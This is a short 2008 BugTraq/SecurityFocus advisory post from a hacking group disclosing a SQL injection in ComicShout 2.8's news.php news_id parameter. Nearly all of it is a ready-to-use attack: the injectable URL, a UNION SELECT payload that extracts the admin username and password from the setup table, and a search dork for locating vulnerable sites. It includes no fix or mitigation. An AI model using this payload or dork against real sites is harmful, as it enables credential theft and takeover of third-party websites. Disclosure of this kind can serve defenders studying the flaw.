BugTraq
ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability Jun 02 2008 03:52PM
sys-project hotmail com
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--

--==+ ComicShout 2.8 (news.php news_id) Remote SQL Injection Vulnerability +==--

--==+===================================================================
=================+==--

- dreaming of necessity is reason to comply -

[+] Info:

[~] Bug found by JosS

[~] sys-project[at]hotmail.com

[~] http://www.spanish-hackers.com

[~] EspSeC & Hack0wn!.

[~] Software: ComicShout 2.8

[~] Exploit: Remote SQL Injection [High]

[~] Vuln file: news.php

[~] Dork: "Powered by ComicShout"

[+] Exploit:

[~] /news.php?news_id=[SQL]

[~] 4+union+all+select+0,1,site_admin,site_pass+from+setup/*

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--

--==+ JosS +==--

--==+===================================================================
=================+==--

[+] [The End]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus